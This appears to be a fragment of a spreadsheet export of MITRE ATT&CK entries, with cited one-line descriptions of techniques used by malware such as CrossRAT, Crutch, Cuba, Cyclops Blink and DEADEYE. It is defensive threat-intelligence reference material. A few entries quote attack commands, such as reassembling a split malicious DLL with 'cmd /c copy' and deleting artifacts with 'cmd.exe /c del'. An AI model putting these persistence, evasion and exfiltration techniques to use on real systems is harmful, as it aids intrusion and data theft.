  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) has the ability to execute commands with the COMSPEC environment variable.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--cb68b0a6-1c36-4b60-a19f-7be618b9fb05</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) can list all files on a system.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--5f4c8795-68b6-4935-beb4-adde242f44f6</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) creates a Launch Agent on macOS.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--32b0dfd5-4909-490e-83a4-963a30b44104</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) uses run keys for persistence on Windows.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--8023d964-9013-4f3d-962e-569b799a2991</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is capable of taking screen captures.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--28d4a66d-2b1f-4662-9e8e-4ba8ff4bcaf0</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) can use an XDG Autostart to establish persistence.(Citation: Red Canary Netwire Linux 2022)</t>
  </si>
  <si>
    <t>relationship--c848ea14-292b-4ad8-ab58-70b26b023275</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--01202a82-56cc-4770-abf1-1a37c8717dba</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can automatically monitor removable drives in a loop and copy interesting files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--c9e82790-f096-46f0-ba55-579d77ec3ea8</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has automatically exfiltrated stolen files to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--be7f2951-ce33-4d48-ad9c-69071e54ae18</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can use Dropbox to receive commands and upload stolen data.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--0f3a304a-574d-4ccc-b7d6-c546cd27fedd</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--ae75aace-822c-484e-b25c-7d5f6792928c</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate files from compromised systems.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--cb41e11f-1a03-43f3-af0e-a7318632350f</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor removable drives and exfiltrate files matching a given extension list.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--97cfa5ec-e6b6-40cc-b73c-283f4a5d8ded</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate data over the primary C2 channel (Dropbox HTTP API).(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--f78542d4-3e7b-4a73-a47e-1fc0a15fbe24</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has exfiltrated stolen data to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--6193189a-f24c-4680-9a20-d191f42b9c97</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used a hardcoded GitHub repository as a fallback channel.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--d207f54d-81c1-4b20-ba56-575fbdec2f03</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has staged stolen files in the &lt;code&gt;C:\AMD\Temp&lt;/code&gt; directory.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--dd45bff3-368a-4a3b-a97e-8bdeb753aedf</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has established persistence with a scheduled task impersonating the Outlook item finder.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--9d7c40f1-44ad-47ec-9a07-bc3b8f2d2cd1</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor for removable drives being plugged into the compromised machine.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--0e1de5dd-5f5c-4014-899b-0ab676322d80</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has the ability to persist using scheduled tasks.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--43815eb8-45cf-4032-8958-d3e73f0a229e</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--1ca96a8d-898b-4778-b3c3-3c80ccbb407f</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can retrieve files from the local file system.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--0994d9a9-b94e-4235-b762-18c2f7b2ed57</t>
  </si>
  <si>
    <t>18 August 2020</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can engage in encrypted communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--0d6e04e8-8e4c-4ef6-ab6a-12ddb498e93a</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability delete files from a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--67272019-b1e1-4c4e-8b7f-cd73b3ed6a31</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can scan a directory to identify files for deletion.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--9e9b9874-f853-4945-9389-54174c2a7bfc</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability to send and receive files.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--dc802d43-a21f-4871-a281-4896817b9bc1</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can use TCP in communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--dd2c9cb1-9c5a-4c97-83e4-4beee309a7cb</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can gather data on the user of a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--e3fe5089-90fc-47e6-afc7-fb0c41ba7c0c</t>
  </si>
  <si>
    <t>S0625</t>
  </si>
  <si>
    <t>Cuba</t>
  </si>
  <si>
    <t>malware--6cd07296-14aa-403d-9229-6343d03d4752</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) has used &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt; to elevate privileges.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--c280ba3f-7210-4608-b895-d29932938fe7</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has the ability to encrypt system data and add the ".cuba" extension to encrypted files.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--2212e364-d161-49ba-9a3f-a4e9e2260b2e</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can use the command &lt;code&gt;cmd.exe /c del&lt;/code&gt; to delete its artifacts from the system.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--53d47656-2154-4e25-82f9-3dcecd37a05a</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can enumerate files by using a variety of functions.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--61a3d7e0-3663-4fb7-9bb3-20a73257f27d</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has executed hidden PowerShell windows.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--fa0705b0-8006-4e73-9a7c-aa051320f8b4</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can download files from its C2 server.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--633959b9-383c-486d-9e36-520e5afc502d</t>
  </si>
  <si>
    <t>18 June 2021</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) logs keystrokes via polling by using &lt;code&gt;GetKeyState&lt;/code&gt; and &lt;code&gt;VkKeyScan&lt;/code&gt; functions.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--64eedc04-9dca-4e47-9465-a3d0b51d02f1</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--ed136275-95b7-4f46-914c-a7f964558278</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--1326a801-6937-42ab-9916-e142ccc64261</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can discover shared resources using the &lt;code&gt;NetShareEnum&lt;/code&gt; API call.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--268e786f-a23c-4bf3-a331-e2b9163b2974</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--662f14ec-90c6-48f7-98c6-ba028ca38621</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--5b62e906-a48a-4897-82cf-49a947782780</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can enumerate processes running on a victim's machine.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--c253f0c5-1802-4853-b93f-c426d2a48fae</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) loaded the payload into memory using PowerShell.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--586b8b1d-109f-4f35-bcf8-589993d18681</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) has a hardcoded list of services and processes to terminate.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--677ec8f6-e06d-4d84-82de-af20953450ec</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has a packed payload when delivered.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--1161865b-7120-4ca3-a4dd-6d1ee0e02609</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can enumerate local drives, disk type, and disk free space.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--059a2b6f-2b77-4f71-acd4-a3c39c4c2da4</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can check if Russian language is installed on the infected machine by using the function &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt;.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--19f3cd7b-3a05-452f-8198-1efdf8207684</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can retrieve the ARP cache from the local system by using &lt;code&gt;GetIpNetTable&lt;/code&gt;.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--7b4b7094-25fc-4556-8706-191d1ca04610</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can use the function &lt;code&gt;GetIpNetTable&lt;/code&gt; to recover the last connections to the victim's machine.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--7c859c07-f840-42da-958f-4c6af48a2498</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can query service status using &lt;code&gt;QueryServiceStatusEx&lt;/code&gt; function.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>relationship--974cd5a0-3519-4488-a935-06a0ef498f46</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; and batch files for execution.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--4fb1988e-d8f5-41fb-9dde-7ad864acfd51</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can modify services by using the &lt;code&gt;OpenService&lt;/code&gt; and &lt;code&gt;ChangeServiceConfig&lt;/code&gt; functions.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>relationship--0a8d1f91-445a-4260-83b2-e13725b0a8d6</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</si>
  <si>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</si>
  <si>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relationship--0766fe91-a8d9-42bd-8023-f2134b280211</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--4b2668bf-31ee-4bee-a624-ab526124623b</t>
  </si>
  <si>
    <t>03 March 2022</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can upload files from a compromised host.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--5403aad2-3840-4b49-8124-961e1a24d044</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can decrypt and parse instructions sent from C2.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--e98ae201-7492-4aef-9b17-6499956bbe2b</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can modify the Linux iptables firewall to enable C2 communication via a stored list of port numbers.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--68650240-a1a6-424b-9711-1201d868305f</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to upload exfiltrated files to a C2 server.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--7fb33043-4b78-407d-a452-d242349d6c0d</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use the Linux API `statvfs` to enumerate the current working directory.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--650fddda-8aa5-4311-9772-ba8ab0ed4afa</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to download files to target systems.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--ca7d9090-d5ff-4a10-b403-015daa559e84</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to create a pipe to enable inter-process communication.(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--aba4b49c-0e87-4e81-81ce-cdefff278c5f</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</si>
  <si>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</si>
  <si>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relationship--1ad60707-d84f-4768-9013-6b499de49c40</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has used [Tor](https://attack.mitre.org/software/S0183) nodes for C2 traffic.(Citation: NCSC CISA Cyclops Blink Advisory February 2022)</t>
  </si>
  <si>
    <t>relationship--aa498c95-d53a-4ab7-96ba-26d7111d71d0</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use various Linux API functions including those for execution and discovery.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--0229d70b-03ef-4744-aa06-348dd4bcbd10</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use a custom binary scheme to encode messages with specific commands and parameters to be executed.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--97da1ec3-e4cd-451e-83be-d53adabb78ed</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--f4a65903-0b28-4e52-ad3b-bb7c55772509</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can enumerate the process it is currently running under.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--8b3cb69c-7b85-4d52-8cab-867ea1126fc7</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use DNS over HTTPS (DoH) to resolve C2 nodes.(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--f3b71f03-f6d5-4ae2-a8e8-a6263550e5a5</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to execute on device startup, using a modified RC script named S51armled.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--e8a13c1f-d4b9-495d-b039-112c4d60916b</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to query device information.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--350776c3-9234-4c8f-adff-9b36778e90c4</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use the Linux API `if_nameindex` to gather network interface names.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--8bb3348e-f844-4e02-8f15-3e509478f120</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--10b32db9-57a8-4baa-b540-3d26f9c7137b</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can download files via HTTP and HTTPS.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--e597058d-ca4b-48e8-b924-8f1e8db34dc0</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has encrypted drives using the core encryption mechanism from DiskCryptor.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--696c0ce2-7829-4d95-baab-ae64db59c62a</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has masqueraded its service as a legitimate svchost.exe process.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--07019af0-e801-48c7-a3bd-efc637003aa2</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has created Registry keys for persistence.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--150f7dbe-3e64-4ee4-a621-6d416e53af63</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--6b580198-d882-4875-b1d5-ad937b95f12f</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033)'s configuration is encrypted.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--388b7632-476a-4194-be77-451ba13bcb10</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has a function to sleep for two hours before rebooting the system.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--0ef5c336-794e-4700-b40e-c78eed74d353</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) can compare the current time on an infected host with a configuration value to determine when to start the encryption process.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--5c6dfc28-fa7c-4941-a144-890a428f9951</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has created new services for persistence by modifying the Registry.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--0c1acc71-87ca-4dc5-ba28-3d924bc1c93f</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) decodes an embedded configuration using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--309652a1-45a4-4479-9e84-dfab33d0a1f5</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) lists files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--992c7f74-c6d8-43e9-98e7-5818ca9524e3</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) downloads and uploads files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--083cbf6f-82e3-4d78-b18f-aa2d1f566713</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) uses Rundll32 to ensure only a single instance of itself is running at once.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--592324b4-064a-430c-8ffc-7f7acd537778</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--a4cc226c-2858-4040-a90d-5cf1297fd78c</t>
  </si>
  <si>
    <t xml:space="preserve">
The DEADEYE.EMBED variant of [DEADEYE](https://attack.mitre.org/software/S1052) has the ability to embed payloads inside of a compiled binary.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--2eec8dea-fea0-4958-b851-3e549578348f</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--03cb8f9a-7ad7-4aa8-966f-bf768023eb89</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</si>
  <si>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</si>
  <si>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relationship--ba116238-1da4-415f-94a8-d4c577a16561</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can use `msiexec.exe` for execution of malicious DLL.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--202e085f-f9aa-48a3-a49a-d033054c8c51</t>
  </si>
  <si>
    <t>22 December 2022</t>
  </si>
  <si>
    <t>The DEADEYE.EMBED variant of [DEADEYE](https://attack.mitre.org/software/S1052) can embed its payload in an alternate data stream of a local file.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--bc829687-1a36-46f3-9196-79e62f84d005</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--64b7eeef-4ccb-4b92-8224-63f1d61265a5</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) has encrypted its payload.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--0051db4d-9eb9-4b22-93a5-b6593176da75</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can use `rundll32.exe` for execution of living off the land binaries (lolbin) such as `SHELL32.DLL`.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--6fd94786-4ffe-4053-851b-ee62fa558652</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</si>
  <si>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</si>
  <si>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relationship--40e63074-7393-4b47-afe2-afe6d65fd2e3</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can enumerate a victim computer's volume serial number and host name.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--2eb32b46-9833-4391-b282-c7ee10bbfc62</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can discover the DNS domain name of a targeted system.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--b13bb5d3-b725-43f9-89d6-6baaa9481d11</t>
  </si>
  <si>
    <t>[DEADEYE](https://attack.mitre.org/software/S1052) can run `cmd /c copy /y /b C:\Users\public\syslog_6-*.dat C:\Users\public\syslog.dll` to combine separated sections of code into a single DLL prior to execution.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--9b826389-8c99-4b4c-9da6-de41e4f29fc4</t>
  </si>
  <si>
    <t>S0616</t>
  </si>
  <si>
    <t>DEATHRANSOM</t>
  </si>
  <si>
    <t>malware--6de9cad1-eed2-4e27-b0b5-39fa29349ea0</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use public and private key pair encryption to encrypt files for ransom payment.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--34c6a059-9496-4f1e-9331-c1986e62b6a1</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use loop operations to enumerate directories on a compromised host.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--6043fd33-6e50-439a-9ee4-1d24a96fe913</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can download files to a compromised host.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--7bf6a452-db06-4b7a-b177-678fdf841fbf</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--4e7966c2-7ac7-4959-8ee0-dfc6d812e000</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) has the ability to use loop operations to enumerate network resources.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--f723b67d-5d1a-4bb2-8e0c-3d418bd93295</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can enumerate logical drives on a target system.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--e69dfb2f-c89b-4167-9165-4f3026b32ad7</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</si>
  <si>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</si>
  <si>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relationship--6b59ebb4-4993-4a88-96ed-a25d21382d29</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use HTTPS to download files.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--42f6d62c-6477-42b7-8078-76b1f94e6155</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) has the ability to use WMI to delete volume shadow copies.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--cc506d7d-c2c4-4a56-b8d6-bfca131bfcca</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can capture microphone data from the victim's machine.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--cdc0bf25-e132-4214-b3e0-c784da6cfbeb</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--c2fcdaf4-f4e7-446d-8b92-7a9df7ccc1f8</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can download and execute additional payloads.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8f41386c-5760-409e-b8b4-513f3d791d9f</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of logging keystrokes.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--52278e18-f8b3-4bf1-a5d3-ac819ccfd301</t>
  </si>
  <si>
